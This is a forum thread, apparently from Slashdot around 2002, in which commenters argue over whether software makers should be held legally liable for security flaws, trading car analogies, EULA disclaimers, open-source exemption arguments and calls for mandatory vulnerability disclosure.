Increasingly we are seeing laws aimed at reducing our responsibility. I don't know about where you might be, but in this country, it is the law that you have to wear a seatbelt in a car. More dramatically, modern VW Golfs (Rabbits in the States) weigh the better part of a tonne more than early models, entirely due to the safety devices that now have to be incorporated by law. The government is trying to legislate against dying if you drive stupidly. Don't get me wrong, these safety devices are very noble, but legislating their inclusion will continue until we have to drive at 5mph in cotton wool cars.
Laws to punish insecurity in software are precisely the same. I will not guarantee that my software will not blow up. I will not guarantee that it will not eat your enterprise. If you want me to guarantee these things, then you will not be able to afford the cost of my software, that I need to charge to pay my insurance bill.
You can legislate against all the responsibility in the world, but in the end, you will just have abdicated all your rights instead.
This rambling was brought to you by not_cub
q='echo "q=$s$q$s;s=$b$s;b=$b$b;$q"';s=\';b=\\;echo "q=$s$q$s;s=$b$s;b=$b$b;$q"
Proper use of this program requires a third party hardware firewall that blocks the following ports and protocols, 0 thru 65535, tcp, udp, icmp, ip.
Failure to install this firewall may lead to software insecurity.
It'll nuke the software industry, that's what it will do.
Read the comments above. I don't have a choice in using IE. It's tied to the OS; Microsoft admits it. You pay for the OS, so you pay for IE. So it'd better work. Same with Office. NOT the same for freeware I get from download.com, as it is my /choice/ to run that software, and I am not contributing to the resources that go into developing and testing it; ergo, in that scenario, I should be on my own.
"Old man yells at systemd"
Is Red Hat responsible for a collection of packages that they put together or just for the fine things they author and then sell? In other words, if I charge a fee for my ability to put things together for you, am I liable when those things don't work together?
I also worry for consultants. Can I deny the implied merchantability if I install Debian for you? Obviously you have hired me for a specific purpose and I'm supplying you with tools to meet that need.
There is a fine line here, and I'm not encouraged by my government's recent direction on other matters such as DMCA. They can't be counted on to get the difference, or can they? Surely there are meat space equivalents to elucidate the problem, but I worry that common sense may be just as lost here as it is in the confidentiality of email vs US post and phone calls.
DMCA, Hollings, Palladium. What might have sounded like paranoia is now common sense.
I have a 64 1/2 mustang that has a firewall behind the back seat to prevent this type thing. I'm replacing it with a racing gas tank to prevent any kind of leakage in a rear-end accident.
"An influential body of researchers..."
If these guys were any good at research, they would have noticed that the largest single contributor to both the Democratic and Republican presidential campaigns (Not to mention plenty of other campaigns worldwide.) was Microsoft, the mother of all "... software firms that do not do enough to make their products secure." and realize that they have no hope of getting these laws passed in the US.
Software is built for a specific purpose; if that purpose is not met when using the software, the company goes out of business, or they get sued. It is ludicrous to think that suing software companies for security holes is acceptable UNLESS that company is marketing a security product (maybe a firewall or some such). To apply this to other parts of our economy, would it be fair for me to sue Ford if I disconnected my brake cable and then sued them when the modified product crashed? What if I went and bought a new Escort, filled the tank with octane boost, and drove down the highway at 170mph, would I have a case in court against Ford when I lost control due to handling problems? Think about it.
E
> I'm not sure it's fair to hold Microsoft responsible for making
> possible the actions of a malicious hacker. Is it Honda's fault a
> slimjim opens the door of my Civic?
Well, to get a realistic comparison, you'd need to compare on even ground. Pretend for a moment that your car door locks went to "locked" when you pushed the lock button, and "unlocked" when you pushed the unlock. However, they didn't actually engage the tumblers in the door, so when it's locked, the handle still opens the door. Now, there's a switch inside the door that you can get to by pulling the door side off, and when you throw it the tumblers connect and when the door says "locked" it now really means it.
Now, would you blame Honda if they didn't set the switch to "on" at the factory, and didn't tell anyone about the switch, and only acknowledged that it exists when someone in the field finds it and threatens to tell the general public?
I'd bet you would. That's a fairer comparison, and so yes, I think the companies that produce easily exploitable software should be forced to reckoning for it.
Virg
The book...
One of the interesting things that was discussed was software development. Basically, the only "company" that was producing software was the US government.
Why?
Because software became so pervasive in society, many laws were written which regulated the process of software production. Compliance became such a process that the only 'company' that could still afford to make software was the US Government.
The current trend is to produce more and more legislation for software (security holes, hacking, DMCA, etc. etc.) production and usage.
Consequently, the cost of software production becomes higher and higher.
What happens when a company, in a market, creates barriers to entry which are insurmountably high? They are identified as a monopoly and are summarily beaten down (MS aside).
What happens when those barriers have been introduced by federal regulations? The government steps in and either assimilates it or regulates it with an iron fist (or a greased pocket).
-Dennis
Second, if any laws are written, my guess is they would merely extend already existing, more generic laws regarding false advertising. Under such circumstances, software vendors would not be *required by law* to produce secure software. But, if their advertising campaign, sales representatives, or software packages blatantly lead potential consumers to believe that their product is of "enterprise-level", "mission-critical-caliber", "secure", "reliable" or any such wording which implies "secure software", then the law could provide for some serious compensation to the harmed consumer.
To avoid endless legal battles over wording, the government should define an entity whose role would be to design, draft and maintain a *very specific* scale of security levels which defines strong standards for security features within software packages. The scale could not only provide very precise security requirements for software, but also standard types of compensation to the consumer for failure to meet each of its levels' standards.
Such a scale should be massively advertised through all media so consumers would know to look for a software package's rating on such a scale before purchasing it for any mission-critical purpose.
We could let software vendors rate their own software packages according to this scale. If the scale is *specific enough* and clearly defines levels of security, then consumers should have very strong cases to bring to class-action lawsuits to seek compensation in the case such software should fail to meet all of the requirements defined by their advertised grade on the scale.
Such a model would keep the government's involvement minimal and place all of the liabilities on the software vendor, so consumers don't ever have to seek compensation from some government-sanctioned entity which would assign ratings to software packages. We must keep in mind that computer software is by nature a highly volatile, constantly evolving, and rarely flawless type of product, as every new piece of software written is by nature "cutting-edge".
What's obvious malpractice to you and me, might not be so obvious to others.
DMCA, Hollings, Palladium. What might have sounded like paranoia is now common sense.
No laws can be made to punish the software companies for faulty security or stability.
In EVERY EULA I have ever seen and read there is the following clause...
XYZ Co. is not liable for any use or misuse of this product; in fact, the product is not warranted in any way, or even for suitability for any purpose.
All EULAs have the standard disclaimer that this might work, and it might kill 1/2 the planet's population...
Do not look at laser with remaining good eye.
I'm not sure it's fair to hold Microsoft responsible for making possible the actions of a malicious hacker. Is it Honda's fault a slimjim opens the door of my Civic?
It may depend on how easy it would be to prevent a slimjim from working, and if they're informed of the "defect." I'm not a products liability lawyer, but you might argue that if it was reasonably easy to design cars so slimjims don't work, then car manufacturers should be liable for not changing their designs. Or at the least put warning stickers on the cars.
Actually, now that I think of it, I guess a car thief's actions would be a superseding action that would break the causal chain, or something.
Your liability is limited to twenty times the total of what you paid the company for the product.
GNU'ed software is sold at a cost of zero, therefore zero liability.
Now if a company had 100 workstations running some product that they paid $100 each for, then the liability would be $200,000 ($100x100x20). One good slip and a company could be taken out to lunch by lawyers. Let's see, there's this one rich monopoly that the lawyers have their eyes on.
I just envision this giant OGRE game, but instead of the Ogre there's Bill and a million lawyers nipping at his heels as he tears through them belching cream pies.
I used to wonder what was so holy about a silent night, now I have a child.
It's "stupid"? Good way to lead off into a constructive debate. In any case your take is hardly surprising among the paranoid, apparently always-law-breaking and being-censored-against Slashdot crowd. Despite the fact that 95%+ of your life continues and will continue to be "local", the Slashdot crowd continues to pretend that it's a global, borderless universe (what a laugh).
Firstly, I'd like such a feature to be optional. Secondly, it provides no more information than can already be obtained via IP traces, just in a more effective manner that can be used for more effective (hence profitable for sites like Slashdot) advertising, as well as more intelligent features for services which are geographically located (WHICH ALMOST ALL ARE! Jesus, I can't order from half the online stores in the US: you get to the end of wasting your time to find out they don't ship to Canada. Of course they could also calculate duties, etc., though I suppose in the fantasy world of Slashdotland we can just ignore national borders?)
Sooo, if I need to add a "feature" or patch to an M$ program in order to, oh say - keep certain resources on a schedule, would that violate the law?
Seems I've already violated Microsoft's "license"... as it's called. Hey, I'm just trying to figure out how many years in jail we retired IT workers will have to serve.
NIMBA a NIMBA stupid NIMBA coding NIMBA bug NIMBA NIMBA left NIMBA many NIMBA NIMBA NIMBA systems NIMBA NIMBA open NIMBA NIMBA NIMBA NIMBA NIMBA
I wonder what this acronym is supposed to stand for. At first, I thought it meant "Not In My Backyard", but that's usually spelled NIMBY.
Not In My Butt AGAIN ?
I think this is a great idea, and should be extended into other areas. Penalize people who get sick. They should have taken better care of themselves and are costing the rest of us money. And people who have their houses knocked down by an earthquake or flattened by a storm should be fined as well for not taking the proper precautions.
Would these proposed laws provide loopholes for the government's electronic eavesdropping tools like magic lantern and carnivore? Allowing these devices access to your data does not promote security, but it seems that these tools are the next big thing in U.S. intelligence gathering operations. Passing laws like this would create even more hypocrises within our government.
It took legislation to make cars safe. The auto companies hated it. They fought every inch of the way. But it made the auto industry grow up and make their products really work, no matter what.
Every major industry goes through this transition, where society insists that the technology work safely. Railroads did. Steam boilers did. Autos did. Civil engineering did. Electric power did. It's time for computing to do it.
It's time for the software industry to grow up and stop hiding behind one-sided licensing agreements. Software is too important in modern life to be as crappy as it is.
> In any case you could equally say that Microsoft provides you the binary so why don't you just hexedit the security faults out.
We can't do that, because modifying or reverse-engineering the code is forbidden by the EULA.
So there.
Virg
"This program has made an illegal operation and will be shut down."
Though the article mentions Microsoft because of their security record, I think that the drafters of the proposal are "thinking of" consumers, not the fortunes of any one company/group of developers. And, I believe it is the ethical duty of software developers, whether Open Source or proprietary, to think of the users of our software as well. Which is why, as I've said, if drafted correctly I'm not necessarily opposed to such a law.
With regard to the specific example of IE, well, if IE has a security flaw that exemplifies gross negligence, then the fact that it's free won't mitigate against liability. If the flaw is in an OS component (as much of the functionality previously offered in IE is now embodied), then it wasn't free, was it?
WRT to the "seldom used" product, well if the company charged money for it, and if it had a security hole which caused actual damages to one of their customers, why shouldn't they be liable?
What I find far more scary is that if this were to be passed, software vendors would stop telling people that their software was buggy, in the hopes of hiding it. This was exactly the same tactic Microsoft took when releasing the XP patch: they didn't instantly recall their product, they sat on the bug for two weeks while the rest of the world floundered. Microsoft did this just for marketing; imagine if someone was also planning on pressing charges! More extensive laws will obviously just intensify this problem.
Another curiosity: consider for-profit companies, hired by either the government or opposing vendors, whose sole purpose is to exploit software in as many ways as they can, to make sure the American people are "safe".
The gov't should not legislate the quality of software (what a frightening thought); the marketplace should demand it! Once there is real demand for it there will be vendors falling all over themselves to prove how safe their wares are. And eventually the best quality software will win out. Even MS cannot ignore the market for more than a few years. But the market has to tell MS to make a better product (competition would help too).
~Sean
You can sue anyone you'd like to in civil court, so long as you can demonstrate damages.
You are correct that there are some professions with prominent and/or government sponsored board certifications as well as regulations, but this deals more with a person's ability to practice and be insured within a profession.
A lawyer may be disbarred but not sued. He/she may also be sued but not disbarred. In fact, he/she can even be sued if he/she was never a member of the bar (perhaps even for that reason).
The reason why there have been few lawsuits with programmer/software company defendants is that most software comes complete with legal disclaimers for damages done or data lost. As of now, very little software comes with any kind of operational guarantee or implied liability, especially when it comes to potential security exploits.
On a side note, however, perhaps we should stop this thread, for fear that you've planted the idea of programmer certification in the minds of legislators.... before you know it, we programmers might not be able to "practice" until we're well into our thirties.
Raster actually releasing E17 bug free...
Like Gilbert actually fixing the bugs in epplets
Like Miguel making MONO work without Microsoft bugs
Like Mandrake winning qt content
Sure, why not? A piece of software should have a meaningful warranty and should comply with its own warranty. If software causes irreparable damage to something, we're way beyond, in the year 2002, the days of "Hey, if anything at all happens, if the software even works at all, it's not our problem."
If software has a problem which causes me to lose money or to lose my identity or some other problem, there is utterly no reason why the software maker can't or shouldn't be held responsible for fundamental flaws. We're not talking about usage or configuration or intended use but about basic patchable problems associated with foreseeable risks. No, product liability is not intended to hold the manufacturer liable for anything, but instead for reasonable use. You can't reasonably sue a hairdryer maker if you drop it in the bathtub, but if in normal use it bursts into flames and burns you - yeah, you sure can. Same with software. If you're using it correctly and there's some fundamental problem that could have been uncovered if they bothered to do some rudimentary checking, then they should be held liable as well.
Your OS has the word Secur in it?
(www.nsa.gov/selinux)
Hey. Wanna hear the most annoying sound in the world?
If you for whatever reason have a whim for insecurity, you're still a menace to the rest of us. I have access.log files documenting codered and nimda attempts from last July to this afternoon to support this.
I've noticed a pattern in /. over the last couple of months, and it's illogical. The same m$ apologists who beyond reason shout that their platforms are securable are likely to lecture us on how bandwidth is expensive and that we should expect to pay more for it. (I'm not saying you're one of those guys).
Beyond that they perceive they don't have enough money, it's difficult to link the two notions sequentially.
Yielding to the corporate apologists for the sake of conversation, okay. Bandwidth has a total cost of production, let us stipulate. So the bandwidth consumed by codered and nimda can therefore be quantified into a currency value, even if the cost of some (or most) of the bandwidth is distortedly overpriced.
Certification of individual connections by independent third parties is an excellent suggestion for the following reasons:
It's honest work for qualified people. Enough to benefit the economy. Really.
It's good for business models within the industry - users running demonstrably secure platforms like Linux or one of the BSDs (to name only a few) could be given privileges or discounts calculated upon their degree of armor. This could even be stratified, but knowing how MBA and marketing types love complex pricelists I dunno if I want to encourage this to extremes.
The security tests could, and should, produce specific and measurable feedback. M$ claim that codered and nimda have been successfully dealt with, but my logs illustrate a different story. I don't care because my ISP pays for the bandwidth, but they need to worry, and so do their shareholders in the case of publicly-traded ISPs.
Actuarial computation isn't new - it predates business computing in fact by a coupla hundred years. Just as teenagers who wanna drive Corvettes have to pay accordingly high insurance premiums, users of risky operating systems should expect to pay additional charges to help, if not entirely cover the cost of hauling away the corpses.
This may not be of unique benefit to Billy, but it's perfectly fair and equitable to the rest of us on the planet.
give me a
Microsoft has been known to find extremely large security holes and not release patches for them until the holes are public. This is a good device for spin control. I would completely support a law that slapped them with a fine when they did stuff like that. Also, Microsoft takes longer than any other vendor to release patches once alerted to security holes, except for SCO. SCO will flat out not patch security problems that they know about. A friend and I sent in a security hole that allows remote access penetration in SCO UNIX over 3 years ago that has yet to be patched; we send them a reminder every 6 months or so and they still just do nothing.
Read the article you dolt .. Lance Spitzner is Sun Security who reported the problem to CERT from the Honeynet logs!
At least there's active discovery and acknowledgement of their holes and an effort to help the entire community.
I am a security engineer at a financial company in the US. If my company buys and implements a piece of software with security holes, we are held liable under GLB. Why shouldn't the developer as well? It seems unfair to only punish the consumer. McDonald's is held liable for bad burgers and software companies should be too.
Under GLB my CIO can spend time in jail. Just think: your CIO installs a farm of IIS (eeek) servers. You get cracked, and some guy in China has all your customers' SSNs. Now your CIO, Gates, and Baldwin become bunk buddies for the next six months. Hmmmm......
I'm sure that this is targeted at Microsoft, but there'd be a lot of $$$ made off of the folks that developed/distributed BIND and SendMail. Couldn't it also punish sites like Download.com?
... bits and bytes are insignificant when compared to the needs of the world and future generations, and anyone who thinks otherwise needs to re-examine their humanity) I seriously doubt you'd see any improvement for the consumer - the government is the only one who stands to gain, and that kind of greed puts them on the same level as Microsoft.
I know the argument is, "If it's free, it's not liable". So Microsoft reworks its license in such a way that all linked libraries are free (that's an oversimplification) or that you're paying for the right to install, but not the operating system itself. If they were still liable in that instance, then RedHat/Mandrake/Debian/etc. would be in deep do-do.
So how do you prove that the software vendor is liable? If your brakes fail because you never filled your fluid, then the manufacturer is not liable. If your operating system fails because you didn't patch it (and a patch was reasonably available), how different would the situation be?
What about modification? If I put aftermarket rims on my car, that will likely void my warranty and some issues of liability (oversimplification, again). So, a software vendor could make claims that "unauthorized" software (probably open to their interpretation) could have "unexpected" interaction, possibly releasing them from liability.
Another thought: safety recalls. Most of the time, there are not fines for "unsafe" products - there are voluntary or government mandated recalls. If you choose not to return the product, that's your fault. So, when there's a new "security flaw", MS recalls Windows, and you have to uninstall it from your computer and return your media for a refund or replacement. How would that fly? (Many "simple" consumers have a hard time differentiating between the computer and the software: they bought a "Dell": further complicating things)
Retrospective? Would this only apply to new shipments, or to all of the copies of Linux, Mac, and Windows already out there? That'd be a tough sell.
The bottom line: this is motivated by politics and money. It would do nothing to enhance security and consumer rights. Many large companies will freely dump their waste, knowing that it's cheaper to pay the fine than it is to dispose of it "the right way". They just consider the fine an operating cost, which usually gets integrated into their pricing structure. So MS raises their prices to accommodate fines. I seriously doubt the fine would be significant. (Go back to the dumping example: if software flaws result in a bigger fine than destroying the environment, we're all in trouble.)
The best thing about a boolean is even if you are wrong, you are only off by a bit.
Safety and Security are different ideas.
If you sell software that self-destructs, or by some inherent defect, destroys data without external intervention, I can deal with your product being considered negligent.
All products have exploits. As mentioned in the subject, there are a million ways to "crack" a car that can result in damages. We hardly require auto manufacturers to protect vehicles from exploits used externally with malintent.
Without self inflicted damage, I don't see any reason to assume liability.
Instead, why not create standards for security for the different type of applications? Companies who follow these standards can say 'we will code this to be XYZ1.2.3 compliant'. If they say this and aren't compliant, they could be held liable for damages.
Lots of people hate MS for numerous reasons. Some people write software for free so that others can use it and don't have to pay MS for it. Some people pirate MS software, taking away from their precious revenue. Some people talk shit. Some people sue. Some people create viruses and worms to exploit MS software flaws so that lackeys can see the light. Some people write things for fun. Some for money. Some for a vendetta. And whatever other crazy ideas go along with killing the beast.
Right. A better analogy (going with the car theme here) would be something like:
I have a $30,000 check sitting in my car, not necessarily completely hidden and locked in the glove box, but out of view nonetheless. Now, my car is an '86 Caprice Classic. So basically if anyone is actually looking (which in this industry they would have to figure out what server the info is on), they'd be able to get into the car with a slim jim, no problem. Rifle around a bit, find the nice check, sign the check over to themselves and there ya go. (If you're having problems with the check theory, you can still use an American Express credit card as bait.)
Is it Chevy's problem for making crappy locks, or should I have taken the check out of that car and put it into a 2002 Lexus with all the bells and whistles of alarms it takes to get in there? If you don't have the security, don't put valuable information on the machines; that's your own stupidity, not the software companies'.
If a and b in c, and a can create b, and a can create a, and b can create b, and b cannot create a, then a created c.
woo hoo. bring it on. White hat hacking has been dead since every last one of them sold out to the "security industry". Bugtraq serves the sole purpose of distributing exploits to kiddies to keep the "hacker threat" in the media. Down with bugtraq. Down with bugtraq. Down with bugtraq.
How we know is more important than what we know.
Enough already.
Claiming the most secure version of windoze is like claiming to have the tallest building in Topeka, KS.
give me a
I get so tired of all this Topeka bashing on here! It's time for the Big city nazis to stop their ways and once and for all admit that Topeka is a very safe, secure community with much to offer its inhabitants!
(I can't believe I posted that..lol)
-Q
"I was not put on this earth to listen to meat! Frylock..were you?" -Master Shake
thanks its amusing to watch someone like you try to use sarcasm and end up looking stupid
Restaurateurs to be made liable for damages due to bad-tasting food...
Construction companies to be made liable for products which cost too much...
DaimlerChrysler sued by customer who claims his Viper "didn't get him chicks"...
Capitalism fails...
</SARCASM>
C'mon...the market will solve this problem. If people really want security, they should buy the God Damned software that features security. If you buy the software that does not feature security, you are S.O.L.!
Should Microsoft be punished by the courts for its operating systems having shitty uptime? Should you be able to sue GNU because you don't like the names of the command line switches for tar? How is an operating system's security, or lack thereof, an issue that needs to be addressed by our government? Laissez-faire, buttmunch!
<RE_ENABLE_SARCASM>
OTOH, there are an assload of software developers writing shitty code who need to be whipped into shape by the threat of lawsuits...
</RE_ENABLE_SARCASM>
I mean, think about it: Microsoft has always been the majority leader in software systems, and any secure software law will ultimately affect them the hardest. OSS probably won't be touched as hard. Why? I think it's probably because of the public license. Most of the software systems out there, such as MS's systems, require an outlay of money simply to acquire the software or licenses to install multiple copies. If the product is insecure then the company who created it can be liable, since they SOLD it. There was a legal, monetary transaction for the product and the consumer should have certain rights that protect them from faulty products.
OSS on the other hand is typically implemented by people in IT who know where to obtain software updates when needed (note I said TYPICALLY), and since there is usually no money outlaid for the software except perhaps for distro packages, who's to be held responsible for a bug in it?
I said this a while back and I'm saying it again:
There should be criminal and civil penalties for withholding information about security risks. Right now I do not have the legal right to know about security risks that are discovered in systems I use, the creators of those systems are not legally required to inform me when a new risk is discovered. This means that I can not make an informed decision about how to protect myself from the problem. I can't even use a list of currently unresolved risks to help me decide what systems to use and/or purchase.
To me, the withholding of security risk information is a form of fraud. It is the same as rolling back the odometer on a used car. It is the same as selling Pintos with exploding gas tanks and the same as selling flammable pajamas to children. Companies must be required to release security risk information about their systems in a timely manner. They must be legally liable for damages that result from security issues between the time they discover the problem and the time they warn users of the problem. These kinds of penalties will force companies to create secure systems in the first place. And, to warn people in a timely manner so that they can take action to protect themselves. Although it is tempting I don't think the developers should be required to fix the system. But, a list of all outstanding security problems must be included in advertising and on the packaging of any system. People have to be able to make an informed decision about what systems to use. We put warning labels on beer and cigarettes, we require people to wear seat belts, we require the disclosure of the ingredients of all our food, we have lemon laws to protect us from unscrupulous car salesmen, and we have product liability laws that cover every physical thing we purchase. But, we have no equivalent legal protection from the purveyors of software snake oil.
The only way a company should be able to get out from under these penalties is to declare the product "dead", notify all customers of record that no more security support will be given for that product. Declaring the software dead should also require that the source code and/or system designs as well as any patent and copyrights to the system be released to the customers so that customers can arrange for other sources of security support for the system. At that point the company would not be allowed to sell, distribute, or accept any sort of payment including royalties and support payments for the software.
Stonewolf
Though, I don't know what a real law would look like...
Consider, say, the hotel I was at years ago... they had an indoor pool. Before you used the pool, you had to sign a waiver... they had a stack of them in the pool room.
The waiver basically said using the pool was at your own risk, etc, etc.
Now... Dad asked his lawyer later, for kicks.
Say you drowned because you couldn't swim... and they had no lifeguard. This document would protect them... it was fairly clear there was no lifeguard.
But... say the diving board was in disrepair, and broke off while you were about to dive, causing you to fall and break a leg... guess what? That contract doesn't absolve them of responsibility. Why? Because... it was reasonable to expect that the diving board worked... the owner still had a duty to keep the area safe for its users, regardless of their waiver. (If they wanted a waiver to protect them against that, they would have to clearly state the risks... state that the facilities are in bad repair and broken.)
Now.. software, we have these horrible EULAs... but still. I can understand how it's okay for a company to, say, protect itself from being sued over some little bug.. of COURSE they have to. Like.. say Excel crashes while you are in the middle of some work.. and you have to re-do it, so you are late for a meeting, so you lose the deal, etc.
Just as in the real world, where even a disclaimer can't generally release you of all obligation, so should it be with software. I don't know what the wording would be, or what would be fair... but software vendors should have a certain level of accountability for what they do.
Now.. how does this affect OSS? I don't know. Do I think OSS authors should be responsible for what they do? Yes, to a degree.. but there is a problem.. I don't think someone should be sued just because they shared some code with the world and it didn't work.
I think it's sad because in most industries the market (consumer intelligence) reflects the success of a product - and if Microsoft manufactured cars they would've been out of business a while back due to their flawed and undertested designs (obviously car crashes are more severe than computer crashes).
My opinion may be harsh on this topic but I feel that government intervention should be avoided in this situation - let the Microsoft users suffer the result of their decisions.
If someone was warned not to cross a highway and they did, well, they suffer the consequences of their own actions.
Eventually, most people will switch products or run out of money supporting their flawed (hackable) ones.
Let's not create an organisation that will end up being Microsoft's beta team.
This has nothing to do with the discussion.
Look, there are insecure software packages out there. But for each of those insecure software packages there is a more secure alternative. If anyone disagrees with me and has a specific example, please reply.
If organizations have been choosing the insecure packages, they have made their bed to sleep in. Asking a government to step in because they made a choice that turned out to have more risks than they anticipated is disingenuous and naive of that organization.
obviously no deficiencies vs. no obvious deficiencies
It'll probably be as wildly successful as the anti-spam laws. In all seriousness, that would destroy what little of the tech economy we've got left. Nobody would write code anymore for fear of being sued.
If commercial entities were liable for security flaws, as opposed to Open Source projects (due to some kind of liability exemption for them), companies like MS would have a great marketing argument going for them: "Right, you have to pay us for the product, but if you do so you get this really nice, shiny warranty, and if anything happens to your net your ass is covered. If you use the big bad penguin, those guys aren't liable for anything, so if you are reasonable: 'No one ever got fired for buying Microsoft'." Bye bye Open Source in large companies; the company lawyers would hunt down and kill all Open Source being used, to be able to sue in case of trouble.
Already some insurance companies that offer anti-hacking cover are charging higher premiums to clients who use a lot of Microsoft software because vulnerabilities are so regularly found in it.
With tactics like this already in place, not only will Microsoft lobby against it, but so will the insurance industry.
MS will say that it is unfair to be responsible for the actions of hackers/crackers after their software has been released, stating that they have no control of what people do with/to it after it has been sold to the public.
The insurance lobbyists will probably say that laws of this nature are unwarranted. They already have a system in place to protect corporations (for a price).
I also did not like the wording at the end of the article implying that the sys. admin. could be held liable. That seems outrageous, if they are not allowed to put up the protective systems of their own choosing.
It certainly does not claim that Microsoft is responsible for most security issues. If it had I would have expected Butler Lampson to have resigned from the board. It is not usual for NAS reports to target particular companies. It is not likely that David Clark would attack Butler in that way given that they are both LCS computing profs.
The statement about Microsoft is actually introduced from other sources, but in such a way that the casual reader assumes it was a recommendation from the report. The only occurrence of the string 'Microsoft' in the text is Butler's accreditation.
Likewise, I find it hard to find any recommendations. The majority of the report is simply a post-9/11 rehash of three previous reports by the same board. The nearest the report comes to suggesting legislation is:
Consider legislative responses to the failure of existing incentives to cause the market to respond adequately to the security challenge. Possible options include steps that would increase the exposure of software and system vendors and system operators to liability for system breaches and mandated reporting of security breaches that could threaten critical societal functions
That is quite a way from endorsing legislation, which is hardly surprising given the makeup of the panel.
Looking for an Information Security student project suggestion?
Try http://dotcrimeManifesto.com/
"Possible options include steps that would increase the exposure of software and systems vendors and system operators to liability for system breaches,"
the only person(s) liable for a system breach are the people who committed that breach.
While punishing companies for writing insecure software is a start, how many times has it been that a poorly configured server is at fault (ie, not setup correctly or not up to date on patches)?
While a certain level of responsibility lies inside of the software vendor, a still larger majority is with the server administrator.
The patch for Code Red was released in June. CR didn't come until July, iirc. However, millions of people did not patch their systems. Or shut off the silly thing (IIS or ISAPI, take your pick) in the first place.
It is both groups' fault in this scenario: Microsoft for having IIS on by default with it and the end user for not shutting it off.
However, I think it does lie with the end user to be responsible ultimately in maintaining their equipment.
I don't know about the rest of you, but when I use open source software, I don't personally verify that the software is written to my own personal specs.
I actually use the software under the mentality that the source is publicly available, so some other people (who are both more qualified and care more than I) have had the opportunity to review the code and have possibly improved it.
Thus the responsibility for the correct operation of the open source code is partially that of the original writer, the whole open source community, and the user. Since this is such a vague group, it's difficult to hold anyone financially liable for problems. ("Are you a member of the open source community?" "If you're here to sue me, no, I'm not.")
However, it seems like common sense that open source software is provided with a "use at your own risk" type agreement and any trust you have in the software is the same as trusting this vague open source community entity. I'm not familiar with the nuances of the different licenses, but if the "use at your own risk" is not explicitly stated in the public license, maybe it should be. If it already is, then that's a settled matter.
In the case of closed source software, there is a very clear boundary of who wrote the software and thus who may be held responsible for any errors or damage the software causes.
Next, most closed source software is probably sold for a profit. Thus it is the responsibility of the user also to demand some sort of guarantee or warranty or whatnot from the software provider before handing over money for a product that may or may not be suitable for the user's needs. If security is a key need, the user is supposed to buy the software that is guaranteed to be secure.
If the software provider sells a product as "secure" for instance, the user has a right to expect the product to be "secure" as advertised. If it is not, however, the software provider should be held responsible for the same liability as any company that provides defective goods. (i.e. the consumer can sue them for damages caused by defects etc.)
That's why I believe closed source software providers should be held liable for damages caused by defects in their products, whereas the open source community cannot be.
Analogies suck. There is very little in common between fixing cars and fixing software.
How about simply looking at software?
Fixing software is *hard*. It is hard to find the location of bugs in code. It is hard to fix bugs in code. It is unreasonable to assume that the average user is capable of fixing bugs on his own.
So we give them the instructions...
It's still hard. For the average user, it is hard to understand how to go about applying the fix. It is hard to figure out how to compile the application. It is hard to trust the newly-generated executable. It is unreasonable to assume that even with instruction the average user would be able to fix the bug on his own.
To tie this all back into the thread, Open Source software should not be considered exempt from such a (stupid) law just because it comes with source. The source of a program is of no value to the vast majority of its users.
Luckily, this law will not pass and the OSS and GNU and all the proprietary software houses will continue on their merry way without invasive governmental regulation.
With open source, the source code is there for others to fix. That's the whole point of open source. With companies like Microsoft, you get someone sending them an exploit, and them taking 4 months to fix the damn thing because they don't want to hurt Christmas sales. I think that a company, especially one that is charging you for upgrades with you assuming that it's going to be more secure, should be liable to a certain extent. Many companies are pushing for you to upgrade your software, but what are we really getting? I don't need a clipboard buddy, I want something more stable, and more secure.
I have no signature
I think it's a great idea, but if this law was passed, think about the repercussions. People could abuse this by hitting companies up for buggy wares left and right. Not that it's a BAD thing. Maybe it'll give companies *coughmicrosoftcough* the kick in the ass that they need.
see sig. see sig run. run sig run.
If they weren't calling in federal marshals for help in conducting audits, it might seem different, but what possible excuse is there for releasing them from any and all responsibility while THEY can have people with guns and warrants busting into your workplace and tearing apart all your computers?
Hold them to the same strict code that they hold others, and give it just as many teeth as they want to use against you. Granted, that would be hard (imagine getting a warrant to rip apart all the Windows development systems at Microsoft to look for evidence that a bug was maliciously ignored!) but it is starkly insane to expect these guys to have police-like powers yet be exempt from all responsibility themselves.
One element which you are forgetting is that the free market depends upon its participants being knowledgeable
This is not necessarily true. Given a large number of unknowledgeable participants in a market, to the degree that they cannot tell if they have chosen a poor product even after the fact: some of them will choose poor products, and by luck some will accidentally choose better products.
Those that go out of business will stop buying the poor products, or at least not expand as quickly as the business which made better decisions.
In reality it is somewhat difficult to tell how good your security is until you've been breached.
It is also true that the market is not really large enough for a fully liquid "Free Market".
The truth is somewhere in the middle, where companies that make it their business to be informed about security will have an advantage over those that do not, hence government intervention will be bad: it will encourage businesses to let an external organization worry about their security.
Snap! I was going to say that, but you wrote it for me.
Personally, I think the greens and libertarians should merge.
I am a green, yet I'm not a socialist or pro dope. I'm a capitalist and a believer in freedom.
Maybe they should regroup as liberal greens?
- Kaos games and encryption systems developer
Most security breaches stem from misconfigured software not actual bugs in the software.
If the government wants to see some progress made in nation-wide computer security, they ought to not waste money punishing big dumb companies, but instead fund the geeks over at the NSA to work on Open Source security-related projects, much as they did with Linux and ACLs. Otherwise, I fail to see how the courts could be objective. Accidents happen. Would companies get a quota of security holes per year?
Everyone would be in violation....
And of course, if Microsoft is too important to the country to be punished under anti-trust law, what're the chances they (or any other large corp with big bottom lines and lots of legal dollars) would be punished under security law?
BUT.... what if security _claims_ were regulated by a much tighter law -- say, much like SEC filings. I have never read a prospectus that was anything but pessimistic about a company's prospects -- that's because they know that if they put anything that's hype in it, they may as well write a check out for the lawsuit that's coming and perhaps pack for a trip to white-collar jail. OK, unless you're Milliken (?, that one guy pardoned by Clinton who hid in Switzerland for 10 years).
Require an SEC like full disclosure of known vulnerabilities. Assess daily penalties for each week a known vulnerability is kept secret (if you like, only assessed from the day it's found in the wild). Make advertising about security a binding promise. Software companies would be a lot more careful about what they claim and more forthcoming about actual information. And in the presence of more perfect information, the market will serve ALL parties more effectively.
Just my thoughts....
Libertarianism is rich wolves and poor sheep playing gambler's ruin for dinner.
Crimes against Digital Humanity would be the top capital crime, and special courts could be set up by the UN :)
I can just imagine a room full of complete geeks, pocket protectors, glasses, bad hygiene and all, discussing whether or not they were emotionally ready to release their next application.
And they pass the losings on to you!
That's right, now you have to pay higher prices for the same software, whether or not the software itself has flaws, but if the company is losing money on other software, they have to make it up, don't they?
So what does this wind up as? Taxes. The people pay higher prices and the fines go to the government. Though, personally I like higher taxes (I think it benefits everyone), I don't want to see it having a large impact on one segment of the market.
